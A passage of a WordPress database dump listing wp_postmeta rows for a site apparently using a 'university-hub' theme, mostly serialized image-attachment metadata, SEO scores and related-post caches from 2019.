(13116, 5812, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1176;s:6:\"height\";i:881;s:4:\"file\";s:25:\"2019/05/1560679197182.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1560679197182-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1560679197182-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"1560679197182-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1560679197182-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1560679197182-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13117, 5813, '_wp_attached_file', '2019/05/1560679197182-1.jpg'),
(13118, 5813, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1176;s:6:\"height\";i:881;s:4:\"file\";s:27:\"2019/05/1560679197182-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1560679197182-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1560679197182-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"1560679197182-1-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"1560679197182-1-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1560679197182-1-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13119, 5814, '_wp_attached_file', '2019/05/1560679191689.jpg'),
(13120, 5814, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1426;s:6:\"height\";i:891;s:4:\"file\";s:25:\"2019/05/1560679191689.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1560679191689-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1560679191689-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"1560679191689-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1560679191689-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1560679191689-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13121, 5815, '_wp_attached_file', '2019/05/1560679197182-2.jpg'),
(13122, 5815, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1176;s:6:\"height\";i:881;s:4:\"file\";s:27:\"2019/05/1560679197182-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1560679197182-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1560679197182-2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"1560679197182-2-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"1560679197182-2-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1560679197182-2-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13123, 5816, '_wp_attached_file', '2019/05/1560679197182-3.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(13124, 5816, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1176;s:6:\"height\";i:881;s:4:\"file\";s:27:\"2019/05/1560679197182-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1560679197182-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1560679197182-3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"1560679197182-3-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"1560679197182-3-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1560679197182-3-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13125, 5817, '_wp_attached_file', '2019/05/1560679197182-4.jpg'),
(13126, 5817, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1176;s:6:\"height\";i:881;s:4:\"file\";s:27:\"2019/05/1560679197182-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1560679197182-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1560679197182-4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"1560679197182-4-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"1560679197182-4-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1560679197182-4-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13127, 5822, '_edit_lock', '1560737396:14'),
(13128, 5822, '_edit_last', '14'),
(13129, 5823, '_wp_attached_file', '2019/06/62610377_934139496918138_1838974081249050624_o.jpg'),
(13130, 5823, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:58:\"2019/06/62610377_934139496918138_1838974081249050624_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"62610377_934139496918138_1838974081249050624_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"62610377_934139496918138_1838974081249050624_o-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"62610377_934139496918138_1838974081249050624_o-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"62610377_934139496918138_1838974081249050624_o-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"62610377_934139496918138_1838974081249050624_o-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13131, 5822, '_thumbnail_id', '5823'),
(13135, 5822, '_hide_featured', NULL),
(13136, 5822, '_yoast_wpseo_content_score', '90'),
(13137, 5822, '_yoast_wpseo_primary_category', '31'),
(13138, 5822, '_wpas_done_all', '1'),
(13141, 5822, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574967899;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6312;}i:1;a:1:{s:2:\"id\";i:6332;}i:2;a:1:{s:2:\"id\";i:6328;}}}}'),
(13144, 5826, '_edit_lock', '1568450484:14'),
(13145, 5826, '_edit_last', '14'),
(13146, 5827, '_wp_attached_file', '2019/06/64272432_835305933512263_9149808266505617408_o.jpg'),
(13147, 5827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:58:\"2019/06/64272432_835305933512263_9149808266505617408_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"64272432_835305933512263_9149808266505617408_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"64272432_835305933512263_9149808266505617408_o-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"64272432_835305933512263_9149808266505617408_o-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"64272432_835305933512263_9149808266505617408_o-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"64272432_835305933512263_9149808266505617408_o-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13148, 5826, '_thumbnail_id', '5827'),
(13152, 5826, '_hide_featured', NULL),
(13153, 5826, '_yoast_wpseo_content_score', '60'),
(13154, 5826, '_yoast_wpseo_primary_category', '31'),
(13155, 5826, '_wpas_done_all', '1'),
(13158, 5826, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574721983;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6316;}i:1;a:1:{s:2:\"id\";i:6334;}i:2;a:1:{s:2:\"id\";i:5029;}}}}'),
(13162, 5830, '_edit_lock', '1568450707:14'),
(13163, 5830, '_edit_last', '14'),
(13164, 5831, '_wp_attached_file', '2019/06/20190618091709511.pdf'),
(13168, 5830, '_hide_featured', NULL),
(13169, 5830, '_yoast_wpseo_content_score', '60'),
(13170, 5830, '_yoast_wpseo_primary_category', '3'),
(13171, 5830, '_wpas_done_all', '1'),
(13176, 5830, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575719822;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5897;}}}}'),
(13177, 5834, '_wp_attached_file', '2019/06/20190618091709511-1.pdf'),
(13178, 5835, '_wp_attached_file', '2019/06/20190618091709511-2.pdf'),
(13183, 5837, '_edit_lock', '1568450763:14'),
(13184, 5837, '_edit_last', '14'),
(13185, 5838, '_wp_attached_file', '2019/06/64553996_2362558003809531_7411007850689855488_n.jpg'),
(13186, 5838, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:59:\"2019/06/64553996_2362558003809531_7411007850689855488_n.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"64553996_2362558003809531_7411007850689855488_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"64553996_2362558003809531_7411007850689855488_n-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"64553996_2362558003809531_7411007850689855488_n-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"64553996_2362558003809531_7411007850689855488_n-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"64553996_2362558003809531_7411007850689855488_n-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13187, 5837, '_thumbnail_id', '5838'),
(13191, 5837, '_hide_featured', NULL),
(13192, 5837, '_yoast_wpseo_content_score', '30'),
(13193, 5837, '_yoast_wpseo_primary_category', '31'),
(13194, 5837, '_wpas_done_all', '1'),
(13196, 5837, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575613470;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5104;}i:1;a:1:{s:2:\"id\";i:5094;}i:2;a:1:{s:2:\"id\";i:4746;}}}}'),
(13198, 5842, '_wp_attached_file', '2019/05/Untitled-1.jpg'),
(13199, 5842, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:360;s:4:\"file\";s:22:\"2019/05/Untitled-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x288.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x150.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13200, 5844, '_wp_attached_file', '2019/05/Untitled-2.jpg'),
(13201, 5844, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:480;s:4:\"file\";s:22:\"2019/05/Untitled-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-2-768x288.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-2-1024x384.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-2-400x150.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13202, 5845, '_wp_attached_file', '2019/05/Untitled-3.jpg'),
(13203, 5845, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:22:\"2019/05/Untitled-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-3-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Untitled-3-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-3-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-3-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13204, 5846, '_wp_attached_file', '2019/05/Slide1-1.png'),
(13205, 5846, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:20:\"2019/05/Slide1-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Slide1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Slide1-1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Slide1-1-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Slide1-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13206, 5847, '_wp_attached_file', '2019/05/Slide1-2.png'),
(13207, 5847, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:20:\"2019/05/Slide1-2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Slide1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Slide1-2-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Slide1-2-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Slide1-2-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13208, 5848, '_wp_attached_file', '2019/05/Slide1-3.png'),
(13209, 5848, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:20:\"2019/05/Slide1-3.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Slide1-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Slide1-3-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Slide1-3-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Slide1-3-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13210, 5850, '_wp_attached_file', '2019/05/Untitled-4.jpg'),
